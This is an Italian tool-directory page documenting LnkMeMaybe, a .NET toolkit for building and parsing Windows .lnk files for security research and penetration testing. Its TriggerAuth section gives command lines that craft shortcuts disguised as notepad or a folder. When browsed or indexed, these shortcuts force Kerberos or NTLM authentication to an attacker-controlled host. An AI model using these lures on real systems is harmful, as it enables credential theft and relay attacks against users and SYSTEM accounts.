Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
LnkMeMaybe — Strumenti di creazione e ricerca Lnk | Kitploit
Strumenti/GitHubGitHub/trustedsec/lnkmemaybe
Generazione di PayloadExploitDigital ForensicsPenetration TestingIngegneria SocialeAnalisi di Binari
GitHubtrustedsec/lnkmemaybe

LnkMeMaybe

Strumenti di creazione e ricerca Lnk

Vedi Repository
1851146 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Sito web
Condividi

LnkMeMaybe

Un toolkit .NET 8 per creare e analizzare file Windows Shell Link (.lnk). Include un generatore da riga di comando (LnkMeMaybe) e un editor grafico (LnkUi). Pensato per la ricerca sulla sicurezza e i test di penetrazione.


Progetti

Scarica lo strumento
ProgettoDescrizione
Lnk/Libreria principale. Analizza e genera il formato binario .lnk secondo la specifica MS-SHLLINK. LnkHandler è il punto di ingresso principale e compone ShellLinkHeader, LinkTargetIDList, LinkInfo, StringData ed ExtraData.
LnkMeMaybe/Strumento CLI. Comandi per generare una varietà di file .lnk. Usa il framework Titanis.Cli.
LnkUi/Editor desktop MVVM Avalonia 11. Sette ViewModel incapsulano i corrispondenti componenti della libreria Lnk. Utile per l'esplorazione e l'ispezione manuale dei file .lnk.
LnkTests/Suite MSTest. Campioni reali di file .lnk sono incorporati come risorse. Copre ShellLinkHeader e LinkInfo.

CLI — LnkMeMaybe

Parametri Comuni

Tutti i comandi condividono i seguenti parametri di base (da BaseSavedCommand):

ParametroAliasObbligatorioDescrizione
--OutputPathSìPercorso del filesystem in cui scrivere il file .lnk.
--OverwriteNoConsente di sovrascrivere un file esistente in OutputPath.
--DisplayNameNoTesto mostrato al passaggio del mouse sulla scorciatoia. Supporta \n per le nuove righe.
--IconPath / -I-INoPercorso di un .exe o .dll da usare come icona della scorciatoia. Deve esistere sul sistema target.
--IconIndexNoIndice della risorsa icona all'interno del file specificato da --IconPath. Predefinito: 0.

TriggerAuth (CVE-2026-25185)

Crea un .lnk che attiva l'autenticazione Kerberos (con fallback a NTLM) verso un server specificato. Il .lnk non esegue nulla.

Scenari in cui viene attivata l'autenticazione:

  1. Un utente accede alla condivisione contenente il .lnk — l'account dell'utente si autentica in uscita.
  2. Il .lnk viene inserito in una posizione che la macchina è configurata per indicizzare — SearchProtocolHost si autentica come SYSTEM.
  3. MSSense è in esecuzione e la posizione non è esclusa — MSSense.exe si autentica come SYSTEM.

Parametri:

ParametroAliasObbligatorioDescrizione
--FakePath / -F-FSìPercorso mostrato come destinazione nelle proprietà del .lnk.
--Server / -S-SSìHostname, IP o percorso UNC del server a cui inviare l'autenticazione. Aggiunge IPC$ se non viene specificata una condivisione.
--DarwinNoIdentificatore Darwin memorizzato nel .lnk. Può essere un valore qualsiasi. Predefinito: unset.

Esempi:

root@kitploit:~
# Send authentication to \\controlled.example.org\IPC$ while posing as notepad
LnkMeMaybe.exe TriggerAuth -F C:\Windows\notepad.exe -S \\controlled.example.org -DisplayName notepad.exe -I C:\Windows\notepad.exe -OutputPath notepad.lnk

# Send authentication to a specific share path while posing as a folder shortcut
LnkMeMaybe.exe TriggerAuth -F C:\Users\Public -S \\controlled.example.org\validshare\somefile.txt -DisplayName C:\Users\Public -I C:\Windows\system32\imageres.dll -IconIndex 3 -OutputPath Public.lnk

WebShortcut

Crea un file .lnk che punta a un URL web. Normalmente Windows crea un file .url per le scorciatoie web; questo comando produce invece un .lnk.

Parametri:

ParametroObbligatorioDescrizione
--UrlSìL'URL a cui deve puntare la scorciatoia. Deve essere un URI assoluto ben formato.

Esempio:

root@kitploit:~
LnkMeMaybe.exe WebShortcut -Url https://example.org -OutputPath example.lnk

LocalShortcut

Crea una scorciatoia Windows standard per un file o una cartella locale. Il percorso di destinazione è memorizzato come elenco di ID di elementi shell (PIDL) — il formato nativo usato da Windows per le scorciatoie del filesystem.

Parametri:

ParametroAliasObbligatorioDescrizione
--TargetPathSìPercorso assoluto del file o della cartella di destinazione.
--ArgumentsNoArgomenti della riga di comando da passare alla destinazione.
--WorkingDirectory-WNoDirectory di lavoro per il processo di destinazione.
--RunAsAdminNoRichiede l'elevazione UAC all'avvio della scorciatoia.
--ShowCommandNoStato della finestra all'avvio: Normal, Maximized o Minimized.

Esempi:

root@kitploit:~
# Create a shortcut to Notepad
LnkMeMaybe.exe LocalShortcut --TargetPath C:\Windows\notepad.exe --OutputPath notepad.lnk

# Shortcut with arguments and a custom icon
LnkMeMaybe.exe LocalShortcut --TargetPath C:\Windows\notepad.exe --Arguments myfile.txt --WorkingDirectory C:\Users\Public --OutputPath notepad.lnk -I C:\Windows\notepad.exe

# Shortcut that opens maximised and requests elevation
LnkMeMaybe.exe LocalShortcut --TargetPath C:\Windows\System32\cmd.exe --ShowCommand Maximized --RunAsAdmin --OutputPath cmd_admin.lnk

EnvShortcut

Crea un .lnk in cui il percorso di destinazione è memorizzato come stringa espandibile di variabili d'ambiente (EnvironmentVariableDataBlock). Questo è il formato che Windows usa per le scorciatoie degli eseguibili di sistema (ad es. %SystemRoot%\system32\notepad.exe). Le variabili vengono espanse al momento dell'avvio, rendendo la scorciatoia portabile tra le installazioni di Windows.

Parametri:

ParametroAliasObbligatorioDescrizione
--TargetPathSìPercorso di destinazione; può includere variabili d'ambiente come %SystemRoot% o %USERPROFILE%.
--ArgumentsNoArgomenti della riga di comando da passare alla destinazione.
--WorkingDirectory-WNoDirectory di lavoro per il processo di destinazione.
--RunAsAdminNoRichiede l'elevazione UAC all'avvio della scorciatoia.
--ShowCommandNoStato della finestra all'avvio: Normal, Maximized o Minimized.

Esempi:

root@kitploit:~
# Shortcut to Notepad using an environment variable path
LnkMeMaybe.exe EnvShortcut --TargetPath "%SystemRoot%\system32\notepad.exe" --OutputPath notepad.lnk

# Shortcut to a user-profile app with arguments
LnkMeMaybe.exe EnvShortcut --TargetPath "%LOCALAPPDATA%\MyApp\app.exe" --Arguments "--config default" --WorkingDirectory "%USERPROFILE%" --OutputPath myapp.lnk

Compilazione

root@kitploit:~
# Build (debug)
dotnet build Lnk.sln

# Build (release, core projects only)
dotnet build -c Release build.slnf

# Run all tests
dotnet test

# Run a specific test class
dotnet test --filter "ClassName=lnkHeader"

# Publish self-contained single-file executable (Windows x64)
dotnet publish -c Release -r win-x64 -p:PublishSingleFile=true -p:DebugType=None --self-contained true --output LnkMeMaybeWindows LnkMeMaybe/LnkMeMaybe.csproj

Rilasci

Binari precompilati per Windows, Linux e macOS (x64 e arm64) sono disponibili nella pagina Rilasci.

Ogni release include build sia standalone (senza runtime .NET richiesto) che dipendenti dal framework (richiedono il runtime .NET 8) per LnkMeMaybe e LnkUi.

Dichiarazione sull'uso dell'IA

Sistemi di IA sono stati utilizzati per le seguenti attività:

  • Revisione della qualità del codice
  • Generazione del README
  • Azioni dei workflow GitHub

Il codice presente in questo repository è stato per il resto creato e revisionato da esseri umani.